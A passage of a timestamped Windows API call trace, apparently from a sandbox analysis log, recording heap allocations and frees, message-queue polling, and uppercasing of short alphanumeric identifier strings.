lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.718] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.718] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0256.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1738 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.719] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.719] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0256.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.720] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.720] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.720] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.721] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.721] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.721] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.721] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0256.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.721] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.722] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.722] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.722] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.723] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.723] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0256.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.725] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.725] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.725] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.725] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0256.725] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.726] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0256.726] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.726] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.726] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.726] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.726] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.727] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.727] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.727] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.727] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.727] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.727] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.728] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.728] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.728] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.728] RtlAllocateHeap (HeapHandle=0x25c0000, 